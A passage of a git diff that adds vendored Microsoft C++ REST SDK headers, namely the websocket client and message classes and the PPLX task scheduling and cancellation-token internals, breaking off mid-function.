/// + /// Use the to fill in desired headers. + /// + web::http::http_headers& headers() { return m_headers; } + + /// + /// Gets a const reference to the headers of the WebSocket protocol handshake HTTP message. + /// + /// HTTP headers. + const web::http::http_headers& headers() const { return m_headers; } + + /// + /// Adds a subprotocol to the request headers. + /// + /// The name of the subprotocol. + /// If additional subprotocols have already been specified, the new one will just be added. + _ASYNCRTIMP void add_subprotocol(const ::utility::string_t& name); + + /// + /// Gets list of the specified subprotocols. + /// + /// Vector of all the subprotocols + /// If you want all the subprotocols in a comma separated string + /// they can be directly looked up in the headers using 'Sec-WebSocket-Protocol'. + _ASYNCRTIMP std::vector<::utility::string_t> subprotocols() const; + + /// + /// Gets the server certificate validation property. + /// + /// True if certificates are to be verified, false otherwise. + bool validate_certificates() const { return m_validate_certificates; } + + /// + /// Sets the server certificate validation property. + /// + /// False to turn ignore all server certificate validation errors, true + /// otherwise. Note ignoring certificate errors can be dangerous and should be done with + /// caution. + void set_validate_certificates(bool validate_certs) { m_validate_certificates = validate_certs; } + +#if !defined(_WIN32) || !defined(__cplusplus_winrt) + /// + /// Sets a callback to enable custom setting of the ssl context, at construction time. + /// + /// A user callback allowing for customization of the ssl context at construction + /// time. + void set_ssl_context_callback(const std::function& callback) + { + m_ssl_context_callback = callback; + } + + /// + /// Gets the user's callback to allow for customization of the ssl context. + /// + const std::function& get_ssl_context_callback() const + { + return m_ssl_context_callback; + } +#endif + +private: + web::web_proxy m_proxy; + web::credentials m_credentials; + web::http::http_headers m_headers; + bool m_sni_enabled; + utf8string m_sni_hostname; + bool m_validate_certificates; +#if !defined(_WIN32) || !defined(__cplusplus_winrt) + std::function m_ssl_context_callback; +#endif +}; + +/// +/// Represents a websocket error. This class holds an error message and an optional error code. +/// +class websocket_exception : public std::exception +{ +public: + /// + /// Creates an websocket_exception with just a string message and no error code. + /// + /// Error message string. + websocket_exception(const utility::string_t& whatArg) : m_msg(utility::conversions::to_utf8string(whatArg)) {} + +#ifdef _WIN32 + /// + /// Creates an websocket_exception with just a string message and no error code. + /// + /// Error message string. + websocket_exception(std::string whatArg) : m_msg(std::move(whatArg)) {} +#endif + + /// + /// Creates a websocket_exception from a error code using the current platform error category. + /// The message of the error code will be used as the what() string message. + /// + /// Error code value. + websocket_exception(int errorCode) : m_errorCode(utility::details::create_error_code(errorCode)) + { + m_msg = m_errorCode.message(); + } + + /// + /// Creates a websocket_exception from a error code using the current platform error category. + /// + /// Error code value. + /// Message to use in what() string. + websocket_exception(int errorCode, const utility::string_t& whatArg) + : m_errorCode(utility::details::create_error_code(errorCode)) + , m_msg(utility::conversions::to_utf8string(whatArg)) + { + } + +#ifdef _WIN32 + /// + /// Creates a websocket_exception from a error code and string message. + /// + /// Error code value. + /// Message to use in what() string. + websocket_exception(int errorCode, std::string whatArg) + : m_errorCode(utility::details::create_error_code(errorCode)), m_msg(std::move(whatArg)) + { + } + + /// + /// Creates a websocket_exception from a error code and string message to use as the what() argument. + /// Error code. + /// Message to use in what() string. + /// + websocket_exception(std::error_code code, std::string whatArg) + : m_errorCode(std::move(code)), m_msg(std::move(whatArg)) + { + } +#endif + + /// + /// Creates a websocket_exception from a error code and category. The message of the error code will be used + /// as the what string message. + /// + /// Error code value. + /// Error category for the code. + websocket_exception(int errorCode, const std::error_category& cat) : m_errorCode(std::error_code(errorCode, cat)) + { + m_msg = m_errorCode.message(); + } + + /// + /// Creates a websocket_exception from a error code and string message to use as the what() argument. + /// Error code. + /// Message to use in what() string. + /// + websocket_exception(std::error_code code, const utility::string_t& whatArg) + : m_errorCode(std::move(code)), m_msg(utility::conversions::to_utf8string(whatArg)) + { + } + + /// + /// Gets a string identifying the cause of the exception. + /// + /// A null terminated character string. + const char* what() const CPPREST_NOEXCEPT { return m_msg.c_str(); } + + /// + /// Gets the underlying error code for the cause of the exception. + /// + /// The error_code object associated with the exception. + const std::error_code& error_code() const CPPREST_NOEXCEPT { return m_errorCode; } + +private: + std::error_code m_errorCode; + std::string m_msg; +}; + +namespace details +{ +// Interface to be implemented by the websocket client callback implementations. +class websocket_client_callback_impl +{ +public: + websocket_client_callback_impl(websocket_client_config config) : m_config(std::move(config)) {} + + virtual ~websocket_client_callback_impl() CPPREST_NOEXCEPT {} + + virtual pplx::task connect() = 0; + + virtual pplx::task send(websocket_outgoing_message& msg) = 0; + + virtual void set_message_handler(const std::function& handler) = 0; + + virtual pplx::task close() = 0; + + virtual pplx::task close(websocket_close_status close_status, + const utility::string_t& close_reason = _XPLATSTR("")) = 0; + + virtual void set_close_handler( + const std::function& + handler) = 0; + + const web::uri& uri() const { return m_uri; } + + void set_uri(const web::uri& uri) { m_uri = uri; } + + const websocket_client_config& config() const { return m_config; } + + static void verify_uri(const web::uri& uri) + { + // Most of the URI schema validation is taken care by URI class. + // We only need to check certain things specific to websockets. + if (uri.scheme() != _XPLATSTR("ws") && uri.scheme() != _XPLATSTR("wss")) + { + throw std::invalid_argument("URI scheme must be 'ws' or 'wss'"); + } + + if (uri.host().empty()) + { + throw std::invalid_argument("URI must contain a hostname."); + } + + // Fragment identifiers are meaningless in the context of WebSocket URIs + // and MUST NOT be used on these URIs. + if (!uri.fragment().empty()) + { + throw std::invalid_argument("WebSocket URI must not contain fragment identifiers"); + } + } + +protected: + web::uri m_uri; + websocket_client_config m_config; +}; + +// Interface to be implemented by the websocket client task implementations. +class websocket_client_task_impl +{ +public: + _ASYNCRTIMP websocket_client_task_impl(websocket_client_config config); + + _ASYNCRTIMP virtual ~websocket_client_task_impl() CPPREST_NOEXCEPT; + + _ASYNCRTIMP pplx::task receive(); + + _ASYNCRTIMP void close_pending_tasks_with_error(const websocket_exception& exc); + + const std::shared_ptr& callback_client() const { return m_callback_client; }; + +private: + void set_handler(); + + // When a message arrives, if there are tasks waiting for a message, signal the topmost one. + // Else enqueue the message in a queue. + // m_receive_queue_lock : to guard access to the queue & m_client_closed + std::mutex m_receive_queue_lock; + // Queue to store incoming messages when there are no tasks waiting for a message + std::queue m_receive_msg_queue; + // Queue to maintain the receive tasks when there are no messages(yet). + std::queue> m_receive_task_queue; + + // Initially set to false, becomes true if a close frame is received from the server or + // if the underlying connection is aborted or terminated. + bool m_client_closed; + + std::shared_ptr m_callback_client; +}; +} // namespace details + +/// +/// Websocket client class, used to maintain a connection to a remote host for an extended session. +/// +class websocket_client +{ +public: + /// + /// Creates a new websocket_client. + /// + websocket_client() : m_client(std::make_shared(websocket_client_config())) {} + + /// + /// Creates a new websocket_client. + /// + /// The client configuration object containing the possible configuration options to initialize + /// the websocket_client. + websocket_client(websocket_client_config config) + : m_client(std::make_shared(std::move(config))) + { + } + + /// + /// Connects to the remote network destination. The connect method initiates the websocket handshake with the + /// remote network destination, takes care of the protocol upgrade request. + /// + /// The uri address to connect. + /// An asynchronous operation that is completed once the client has successfully connected to the websocket + /// server. + pplx::task connect(const web::uri& uri) + { + m_client->callback_client()->verify_uri(uri); + m_client->callback_client()->set_uri(uri); + auto client = m_client; + return m_client->callback_client()->connect().then([client](pplx::task result) { + try + { + result.get(); + } + catch (const websocket_exception& ex) + { + client->close_pending_tasks_with_error(ex); + throw; + } + }); + } + + /// + /// Sends a websocket message to the server . + /// + /// An asynchronous operation that is completed once the message is sent. + pplx::task send(websocket_outgoing_message msg) { return m_client->callback_client()->send(msg); } + + /// + /// Receive a websocket message. + /// + /// An asynchronous operation that is completed when a message has been received by the client + /// endpoint. + pplx::task receive() { return m_client->receive(); } + + /// + /// Closes a websocket client connection, sends a close frame to the server and waits for a close message from the + /// server. + /// + /// An asynchronous operation that is completed the connection has been successfully closed. + pplx::task close() { return m_client->callback_client()->close(); } + + /// + /// Closes a websocket client connection, sends a close frame to the server and waits for a close message from the + /// server. + /// + /// Endpoint MAY use the following pre-defined status codes when sending a Close + /// frame. While closing an established connection, an endpoint may indicate the + /// reason for closure. An asynchronous operation that is completed the connection has been + /// successfully closed. + pplx::task close(websocket_close_status close_status, const utility::string_t& close_reason = _XPLATSTR("")) + { + return m_client->callback_client()->close(close_status, close_reason); + } + + /// + /// Gets the websocket client URI. + /// + /// URI connected to. + const web::uri& uri() const { return m_client->callback_client()->uri(); } + + /// + /// Gets the websocket client config object. + /// + /// A reference to the client configuration object. + const websocket_client_config& config() const { return m_client->callback_client()->config(); } + +private: + std::shared_ptr m_client; +}; + +/// +/// Websocket client class, used to maintain a connection to a remote host for an extended session, uses callback APIs +/// for handling receive and close event instead of async task. For some scenarios would be a alternative for the +/// websocket_client like if you want to special handling on close event. +/// +class websocket_callback_client +{ +public: + /// + /// Creates a new websocket_callback_client. + /// + _ASYNCRTIMP websocket_callback_client(); + + /// + /// Creates a new websocket_callback_client. + /// + /// The client configuration object containing the possible configuration options to + /// initialize the websocket_client. + _ASYNCRTIMP websocket_callback_client(websocket_client_config client_config); + + /// + /// Connects to the remote network destination. The connect method initiates the websocket handshake with the + /// remote network destination, takes care of the protocol upgrade request. + /// + /// The uri address to connect. + /// An asynchronous operation that is completed once the client has successfully connected to the websocket + /// server. + pplx::task connect(const web::uri& uri) + { + m_client->verify_uri(uri); + m_client->set_uri(uri); + return m_client->connect(); + } + + /// + /// Sends a websocket message to the server . + /// + /// An asynchronous operation that is completed once the message is sent. + pplx::task send(websocket_outgoing_message msg) { return m_client->send(msg); } + + /// + /// Set the received handler for notification of client websocket messages. + /// + /// A function representing the incoming websocket messages handler. It's parameters are: + /// msg: a websocket_incoming_message value indicating the message received + /// + /// If this handler is not set before connecting incoming messages will be missed. + void set_message_handler(const std::function& handler) + { + m_client->set_message_handler(handler); + } + + /// + /// Closes a websocket client connection, sends a close frame to the server and waits for a close message from the + /// server. + /// + /// An asynchronous operation that is completed the connection has been successfully closed. + pplx::task close() { return m_client->close(); } + + /// + /// Closes a websocket client connection, sends a close frame to the server and waits for a close message from the + /// server. + /// + /// Endpoint MAY use the following pre-defined status codes when sending a Close + /// frame. While closing an established connection, an endpoint may indicate the + /// reason for closure. An asynchronous operation that is completed the connection has been + /// successfully closed. + pplx::task close(websocket_close_status close_status, const utility::string_t& close_reason = _XPLATSTR("")) + { + return m_client->close(close_status, close_reason); + } + + /// + /// Set the closed handler for notification of client websocket closing event. + /// + /// The handler for websocket closing event, It's parameters are: + /// close_status: The pre-defined status codes used by the endpoint when sending a Close frame. + /// reason: The reason string used by the endpoint when sending a Close frame. + /// error: The error code if the websocket is closed with abnormal error. + /// + void set_close_handler(const std::function& handler) + { + m_client->set_close_handler(handler); + } + + /// + /// Gets the websocket client URI. + /// + /// URI connected to. + const web::uri& uri() const { return m_client->uri(); } + + /// + /// Gets the websocket client config object. + /// + /// A reference to the client configuration object. + const websocket_client_config& config() const { return m_client->config(); } + +private: + std::shared_ptr m_client; +}; + +} // namespace client +} // namespace websockets +} // namespace web + +#endif + +#endif diff --git a/Src/Common/CppRestSdk/include/cpprest/ws_msg.h b/Src/Common/CppRestSdk/include/cpprest/ws_msg.h new file mode 100644 index 0000000..b9b816b --- /dev/null +++ b/Src/Common/CppRestSdk/include/cpprest/ws_msg.h @@ -0,0 +1,231 @@ +/*** + * Copyright (C) Microsoft. All rights reserved. + * Licensed under the MIT license. See LICENSE.txt file in the project root for full license information. + * + * =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ + * + * Websocket incoming and outgoing message definitions. + * + * =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + ****/ +#pragma once + +#include "Common/CppRestSdk/include/cpprest/details/basic_types.h" + +#if !defined(CPPREST_EXCLUDE_WEBSOCKETS) + +#include "Common/CppRestSdk/include/cpprest/asyncrt_utils.h" +#include "Common/CppRestSdk/include/cpprest/containerstream.h" +#include "Common/CppRestSdk/include/cpprest/streams.h" +#include "Common/CppRestSdk/include/cpprest/uri.h" +#include "Common/CppRestSdk/include/pplx/pplxtasks.h" +#include +#include + +namespace web +{ +namespace websockets +{ +namespace client +{ +namespace details +{ +class winrt_callback_client; +class wspp_callback_client; +#if defined(__cplusplus_winrt) +ref class ReceiveContext; +#endif +} // namespace details + +/// +/// The different types of websocket message. +/// Text type contains UTF-8 encoded data. +/// Interpretation of Binary type is left to the application. +/// Note: The fragment types and control frames like close, ping, pong are not supported on WinRT. +/// +enum class websocket_message_type +{ + text_message, + binary_message, + close, + ping, + pong +}; + +/// +/// Represents an outgoing websocket message +/// +class websocket_outgoing_message +{ +public: +#if !defined(__cplusplus_winrt) + /// + /// Sets a the outgoing message to be an unsolicited pong message. + /// This is useful when the client side wants to check whether the server is alive. + /// + void set_pong_message() { this->set_message_pong(); } +#endif + + /// + /// Sets a UTF-8 message as the message body. + /// + /// UTF-8 String containing body of the message. + void set_utf8_message(std::string&& data) + { + this->set_message(concurrency::streams::container_buffer(std::move(data))); + } + + /// + /// Sets a UTF-8 message as the message body. + /// + /// UTF-8 String containing body of the message. + void set_utf8_message(const std::string& data) + { + this->set_message(concurrency::streams::container_buffer(data)); + } + + /// + /// Sets a UTF-8 message as the message body. + /// + /// casablanca input stream representing the body of the message. + /// Upon sending, the entire stream may be buffered to determine the length. + void set_utf8_message(const concurrency::streams::istream& istream) + { + this->set_message(istream, SIZE_MAX, websocket_message_type::text_message); + } + + /// + /// Sets a UTF-8 message as the message body. + /// + /// casablanca input stream representing the body of the message. + /// number of bytes to send. + void set_utf8_message(const concurrency::streams::istream& istream, size_t len) + { + this->set_message(istream, len, websocket_message_type::text_message); + } + + /// + /// Sets binary data as the message body. + /// + /// casablanca input stream representing the body of the message. + /// number of bytes to send. + void set_binary_message(const concurrency::streams::istream& istream, size_t len) + { + this->set_message(istream, len, websocket_message_type::binary_message); + } + + /// + /// Sets binary data as the message body. + /// + /// Input stream representing the body of the message. + /// Upon sending, the entire stream may be buffered to determine the length. + void set_binary_message(const concurrency::streams::istream& istream) + { + this->set_message(istream, SIZE_MAX, websocket_message_type::binary_message); + } + +private: + friend class details::winrt_callback_client; + friend class details::wspp_callback_client; + + pplx::task_completion_event m_body_sent; + concurrency::streams::streambuf m_body; + websocket_message_type m_msg_type; + size_t m_length; + + void signal_body_sent() const { m_body_sent.set(); } + + void signal_body_sent(const std::exception_ptr& e) const { m_body_sent.set_exception(e); } + + const pplx::task_completion_event& body_sent() const { return m_body_sent; } + +#if !defined(__cplusplus_winrt) + void set_message_pong() + { + concurrency::streams::container_buffer buffer(""); + m_msg_type = websocket_message_type::pong; + m_length = static_cast(buffer.size()); + m_body = buffer; + } +#endif + + void set_message(const concurrency::streams::container_buffer& buffer) + { + m_msg_type = websocket_message_type::text_message; + m_length = static_cast(buffer.size()); + m_body = buffer; + } + + void set_message(const concurrency::streams::istream& istream, size_t len, websocket_message_type msg_type) + { + m_msg_type = msg_type; + m_length = len; + m_body = istream.streambuf(); + } +}; + +/// +/// Represents an incoming websocket message +/// +class websocket_incoming_message +{ +public: + /// + /// Extracts the body of the incoming message as a string value, only if the message type is UTF-8. + /// A body can only be extracted once because in some cases an optimization is made where the data is 'moved' out. + /// + /// String containing body of the message. + _ASYNCRTIMP pplx::task extract_string() const; + + /// + /// Produces a stream which the caller may use to retrieve body from an incoming message. + /// Can be used for both UTF-8 (text) and binary message types. + /// + /// A readable, open asynchronous stream. + /// + /// This cannot be used in conjunction with any other means of getting the body of the message. + /// + concurrency::streams::istream body() const + { + auto to_uint8_t_stream = + [](const concurrency::streams::streambuf& buf) -> concurrency::streams::istream { + return buf.create_istream(); + }; + return to_uint8_t_stream(m_body); + } + + /// + /// Returns the length of the received message. + /// + size_t length() const { return static_cast(m_body.size()); } + + /// + /// Returns the type of the received message. + /// + CASABLANCA_DEPRECATED("Incorrectly spelled API, use message_type() instead.") + websocket_message_type messge_type() const { return m_msg_type; } + + /// + /// Returns the type of the received message, either string or binary. + /// + /// websocket_message_type + websocket_message_type message_type() const { return m_msg_type; } + +private: + friend class details::winrt_callback_client; + friend class details::wspp_callback_client; +#if defined(__cplusplus_winrt) + friend ref class details::ReceiveContext; +#endif + + // Store message body in a container buffer backed by a string. + // Allows for optimization in the string message cases. + concurrency::streams::container_buffer m_body; + websocket_message_type m_msg_type; +}; + +} // namespace client +} // namespace websockets +} // namespace web + +#endif diff --git a/Src/Common/CppRestSdk/include/pplx/pplx.h b/Src/Common/CppRestSdk/include/pplx/pplx.h new file mode 100644 index 0000000..c45f83a --- /dev/null +++ b/Src/Common/CppRestSdk/include/pplx/pplx.h @@ -0,0 +1,211 @@ +/*** + * Copyright (C) Microsoft. All rights reserved. + * Licensed under the MIT license. See LICENSE.txt file in the project root for full license information. + * + * =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ + * + * Parallel Patterns Library + * + * For the latest on this and related APIs, please see: https://github.com/Microsoft/cpprestsdk + * + * =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + ****/ + +#pragma once + +#ifndef _PPLX_H +#define _PPLX_H + +#if (defined(_MSC_VER) && (_MSC_VER >= 1800)) && !CPPREST_FORCE_PPLX +#error This file must not be included for Visual Studio 12 or later +#endif + +#ifndef _WIN32 +#if defined(_WIN32) || defined(__cplusplus_winrt) +#define _WIN32 +#endif +#endif // _WIN32 + +#ifdef _NO_PPLXIMP +#define _PPLXIMP +#else +#ifdef _PPLX_EXPORT +#define _PPLXIMP __declspec(dllexport) +#else +#define _PPLXIMP __declspec(dllimport) +#endif +#endif + +#include "Common/CppRestSdk/include/cpprest/details/cpprest_compat.h" + +// Use PPLx +#ifdef _WIN32 +#include "Common/CppRestSdk/include/pplx/pplxwin.h" +#elif defined(__APPLE__) +#undef _PPLXIMP +#define _PPLXIMP +#include "Common/CppRestSdk/include/pplx/pplxlinux.h" +#else +#include "Common/CppRestSdk/include/pplx/pplxlinux.h" +#endif // _WIN32 + +// Common implementation across all the non-concrt versions +#include "Common/CppRestSdk/include/pplx/pplxcancellation_token.h" +#include + +// conditional expression is constant +#if defined(_MSC_VER) +#pragma warning(push) +#pragma warning(disable : 4127) +#endif + +#pragma pack(push, _CRT_PACKING) + +/// +/// The pplx namespace provides classes and functions that give you access to the Concurrency Runtime, +/// a concurrent programming framework for C++. For more information, see . +/// +/**/ +namespace pplx +{ +/// +/// Sets the ambient scheduler to be used by the PPL constructs. +/// +_PPLXIMP void _pplx_cdecl set_ambient_scheduler(std::shared_ptr _Scheduler); + +/// +/// Gets the ambient scheduler to be used by the PPL constructs +/// +_PPLXIMP std::shared_ptr _pplx_cdecl get_ambient_scheduler(); + +namespace details +{ +// +// An internal exception that is used for cancellation. Users do not "see" this exception except through the +// resulting stack unwind. This exception should never be intercepted by user code. It is intended +// for use by the runtime only. +// +class _Interruption_exception : public std::exception +{ +public: + _Interruption_exception() {} +}; + +template +struct _AutoDeleter +{ + _AutoDeleter(_T* _PPtr) : _Ptr(_PPtr) {} + ~_AutoDeleter() { delete _Ptr; } + _T* _Ptr; +}; + +struct _TaskProcHandle +{ + _TaskProcHandle() {} + + virtual ~_TaskProcHandle() {} + virtual void invoke() const = 0; + + static void _pplx_cdecl _RunChoreBridge(void* _Parameter) + { + auto _PTaskHandle = static_cast<_TaskProcHandle*>(_Parameter); + _AutoDeleter<_TaskProcHandle> _AutoDeleter(_PTaskHandle); + _PTaskHandle->invoke(); + } +}; + +enum _TaskInliningMode +{ + // Disable inline scheduling + _NoInline = 0, + // Let runtime decide whether to do inline scheduling or not + _DefaultAutoInline = 16, + // Always do inline scheduling + _ForceInline = -1, +}; + +// This is an abstraction that is built on top of the scheduler to provide these additional functionalities +// - Ability to wait on a work item +// - Ability to cancel a work item +// - Ability to inline work on invocation of RunAndWait +class _TaskCollectionImpl +{ +public: + typedef _TaskProcHandle _TaskProcHandle_t; + + _TaskCollectionImpl(scheduler_ptr _PScheduler) : _M_pScheduler(_PScheduler) {} + + void _ScheduleTask(_TaskProcHandle_t* _PTaskHandle, _TaskInliningMode _InliningMode) + { + if (_InliningMode == _ForceInline) + { + _TaskProcHandle_t::_RunChoreBridge(_PTaskHandle); + } + else + { + _M_pScheduler->schedule(_TaskProcHandle_t::_RunChoreBridge, _PTaskHandle); + } + } + + void _Cancel() + { + // No cancellation support + } + + void _RunAndWait() + { + // No inlining support yet + _Wait(); + } + + void _Wait() { _M_Completed.wait(); } + + void _Complete() { _M_Completed.set(); } + + scheduler_ptr _GetScheduler() const { return _M_pScheduler; } + + // Fire and forget + static void _RunTask(TaskProc_t _Proc, void* _Parameter, _TaskInliningMode _InliningMode) + { + if (_InliningMode == _ForceInline) + { + _Proc(_Parameter); + } + else + { + // Schedule the work on the ambient scheduler + get_ambient_scheduler()->schedule(_Proc, _Parameter); + } + } + + static bool _pplx_cdecl _Is_cancellation_requested() + { + // We do not yet have the ability to determine the current task. So return false always + return false; + } + +private: + extensibility::event_t _M_Completed; + scheduler_ptr _M_pScheduler; +}; + +// For create_async lambdas that return a (non-task) result, we oversubscriber the current task for the duration of the +// lambda. +struct _Task_generator_oversubscriber +{ +}; + +typedef _TaskCollectionImpl _TaskCollection_t; +typedef _TaskInliningMode _TaskInliningMode_t; +typedef _Task_generator_oversubscriber _Task_generator_oversubscriber_t; + +} // namespace details + +} // namespace pplx + +#pragma pack(pop) +#if defined(_MSC_VER) +#pragma warning(pop) +#endif + +#endif // _PPLX_H diff --git a/Src/Common/CppRestSdk/include/pplx/pplxcancellation_token.h b/Src/Common/CppRestSdk/include/pplx/pplxcancellation_token.h new file mode 100644 index 0000000..3435e2f --- /dev/null +++ b/Src/Common/CppRestSdk/include/pplx/pplxcancellation_token.h @@ -0,0 +1,920 @@ +/*** + * Copyright (C) Microsoft. All rights reserved. + * Licensed under the MIT license. See LICENSE.txt file in the project root for full license information. + * + * =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ + * + * Parallel Patterns Library : cancellation_token + * + * =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + ****/ + +#pragma once + +#ifndef _PPLX_H +#error This header must not be included directly +#endif + +#ifndef _PPLXCANCELLATION_TOKEN_H +#define _PPLXCANCELLATION_TOKEN_H + +#if (defined(_MSC_VER) && (_MSC_VER >= 1800)) && !CPPREST_FORCE_PPLX +#error This file must not be included for Visual Studio 12 or later +#endif + +#include "Common/CppRestSdk/include/pplx/pplxinterface.h" +#include +#include + +#pragma pack(push, _CRT_PACKING) +// All header files are required to be protected from the macro new +#pragma push_macro("new") +#undef new + +namespace pplx +{ +/// +/// This class describes an exception thrown by the PPL tasks layer in order to force the current task +/// to cancel. It is also thrown by the get() method on task, for a +/// canceled task. +/// +/// +/// +/**/ +class task_canceled : public std::exception +{ +private: + std::string _message; + +public: + /// + /// Constructs a task_canceled object. + /// + /// + /// A descriptive message of the error. + /// + /**/ + explicit task_canceled(_In_z_ const char* _Message) throw() : _message(_Message) {} + + /// + /// Constructs a task_canceled object. + /// + /**/ + task_canceled() throw() : exception() {} + + ~task_canceled() throw() {} + + const char* what() const CPPREST_NOEXCEPT { return _message.c_str(); } +}; + +/// +/// This class describes an exception thrown when an invalid operation is performed that is not more accurately +/// described by another exception type thrown by the Concurrency Runtime. +/// +/// +/// The various methods which throw this exception will generally document under what circumstances they will throw +/// it. +/// +/**/ +class invalid_operation : public std::exception +{ +private: + std::string _message; + +public: + /// + /// Constructs an invalid_operation object. + /// + /// + /// A descriptive message of the error. + /// + /**/ + invalid_operation(_In_z_ const char* _Message) throw() : _message(_Message) {} + + /// + /// Constructs an invalid_operation object. + /// + /**/ + invalid_operation() throw() : exception() {} + + ~invalid_operation() throw() {} + + const char* what() const CPPREST_NOEXCEPT { return _message.c_str(); } +}; + +namespace details +{ +// Base class for all reference counted objects +class _RefCounter +{ +public: + virtual ~_RefCounter() { _ASSERTE(_M_refCount == 0); } + + // Acquires a reference + // Returns the new reference count. + long _Reference() + { + long _Refcount = atomic_increment(_M_refCount); + + // 0 - 1 transition is illegal + _ASSERTE(_Refcount > 1); + return _Refcount; + } + + // Releases the reference + // Returns the new reference count + long _Release() + { + long _Refcount = atomic_decrement(_M_refCount); + _ASSERTE(_Refcount >= 0); + + if (_Refcount == 0) + { + _Destroy(); + } + + return _Refcount; + } + +protected: + // Allow derived classes to provide their own deleter + virtual void _Destroy() { delete this; } + + // Only allow instantiation through derived class + _RefCounter(long _InitialCount = 1) : _M_refCount(_InitialCount) { _ASSERTE(_M_refCount > 0); } + + // Reference count + atomic_long _M_refCount; +}; + +class _CancellationTokenState; + +class _CancellationTokenRegistration : public _RefCounter +{ +private: + static const long _STATE_CLEAR = 0; + static const long _STATE_DEFER_DELETE = 1; + static const long _STATE_SYNCHRONIZE = 2; + static const long _STATE_CALLED = 3; + +public: + _CancellationTokenRegistration(long _InitialRefs = 1) + : _RefCounter(_InitialRefs), _M_state(_STATE_CALLED), _M_pTokenState(NULL) + { + } + + _CancellationTokenState* _GetToken() const { return _M_pTokenState; } + +protected: + virtual ~_CancellationTokenRegistration() { _ASSERTE(_M_state != _STATE_CLEAR); } + + virtual void _Exec() = 0; + +private: + friend class _CancellationTokenState; + + void _Invoke() + { + long tid = ::pplx::details::platform::GetCurrentThreadId(); + _ASSERTE((tid & 0x3) == 0); // If this ever fires, we need a different encoding for this. + + long result = atomic_compare_exchange(_M_state, tid, _STATE_CLEAR); + + if (result == _STATE_CLEAR) + { + _Exec(); + + result = atomic_compare_exchange(_M_state, _STATE_CALLED, tid); + + if (result == _STATE_SYNCHRONIZE) + { + _M_pSyncBlock->set(); + } + } + _Release(); + } + + atomic_long _M_state; + extensibility::event_t* _M_pSyncBlock; + _CancellationTokenState* _M_pTokenState; +}; + +template +class _CancellationTokenCallback : public _CancellationTokenRegistration +{ +public: + _CancellationTokenCallback(const _Function& _Func) : _M_function(_Func) {} + +protected: + virtual void _Exec() { _M_function(); } + +private: + _Function _M_function; +}; + +class CancellationTokenRegistration_TaskProc : public _CancellationTokenRegistration +{ +public: + CancellationTokenRegistration_TaskProc(TaskProc_t proc, _In_ void* pData, int initialRefs) + : _CancellationTokenRegistration(initialRefs), m_proc(proc), m_pData(pData) + { + } + +protected: + virtual void _Exec() { m_proc(m_pData); } + +private: + TaskProc_t m_proc; + void* m_pData; +}; + +// The base implementation of a cancellation token. +class _CancellationTokenState : public _RefCounter +{ +protected: + class TokenRegistrationContainer + { + private: + typedef struct _Node + { + _CancellationTokenRegistration* _M_token; + _Node* _M_next; + } Node; + + public: + TokenRegistrationContainer() : _M_begin(nullptr), _M_last(nullptr) {} + + ~TokenRegistrationContainer() + { +#if defined(_MSC_VER) +#pragma warning(push) +#pragma warning(disable : 6001) +#endif + auto node = _M_begin; + while (node != nullptr) + { + Node* tmp = node; + node = node->_M_next; + ::free(tmp); + } +#if defined(_MSC_VER) +#pragma warning(pop) +#endif + } + + void swap(TokenRegistrationContainer& list) + { + std::swap(list._M_begin, _M_begin); + std::swap(list._M_last, _M_last); + } + + bool empty() { return _M_begin == nullptr; } + + template + void for_each(T lambda) + { + Node* node = _M_begin; + + while (node != nullptr) + { + lambda(node->_M_token); + node = node->_M_next; + } + } + + void push_back(_CancellationTokenRegistration* token) + { + Node* node = reinterpret_cast(::malloc(sizeof(Node))); + if (node == nullptr) + { + throw ::std::bad_alloc(); + } + + node->_M_token = token; + node->_M_next = nullptr; + + if (_M_begin == nullptr) + { + _M_begin = node; + } + else + { + _M_last->_M_next = node; + } + + _M_last = node; + } + + void remove(_CancellationTokenRegistration* token) + { + Node* node = _M_begin; + Node* prev = nullptr; + + while (node != nullptr) + { + if (node->_M_token == token) + { + if (prev == nullptr) + { + _M_begin = node->_M_next; + } + else + { + prev->_M_next = node->_M_next; + } + + if (node->_M_next == nullptr) + { + _M_last = prev; + } + + ::free(node); + break; + } + + prev = node; + node = node->_M_next; + } + } + + private: + Node* _M_begin; + Node* _M_last; + }; + +public: + static _CancellationTokenState* _NewTokenState() { return new _CancellationTokenState(); } + + static _CancellationTokenState* _None() { return reinterpret_cast<_CancellationTokenState*>(2); } + + static bool _IsValid(_In_opt_ _CancellationTokenState* _PToken) { return (_PToken != NULL && _PToken != _None()); } + + _CancellationTokenState() : _M_stateFlag(0) {} + + ~_CancellationTokenState() + { + TokenRegistrationContainer rundownList; + { + extensibility::scoped_critical_section_t _Lock(_M_listLock); + _M_registrations.swap(rundownList); + } + + rundownList.for_each([](_CancellationTokenRegistration* pRegistration) { + pRegistration->_M_state = _CancellationTokenRegistration::_STATE_SYNCHRONIZE; + pRegistration->_Release(); + }); + } + + bool _IsCanceled() const { return (_M_stateFlag != 0); } + + void _Cancel() + { + if (atomic_compare_exchange(_M_stateFlag, 1l, 0l) == 0) + { + TokenRegistrationContainer rundownList; + { + extensibility::scoped_critical_section_t _Lock(_M_listLock); + _M_registrations.swap(rundownList); + } + + rundownList.for_each([](_CancellationTokenRegistration* pRegistration) { pRegistration->_Invoke(); }); + + _M_stateFlag = 2; + _M_cancelComplete.set(); + } + } + + _CancellationTokenRegistration* _RegisterCallback(TaskProc_t _PCallback, _In_ void* _PData, int _InitialRefs = 1) + { + _CancellationTokenRegistration* pRegistration = + new CancellationTokenRegistration_TaskProc(_PCallback, _PData, _InitialRefs); + _RegisterCallback(pRegistration); + return 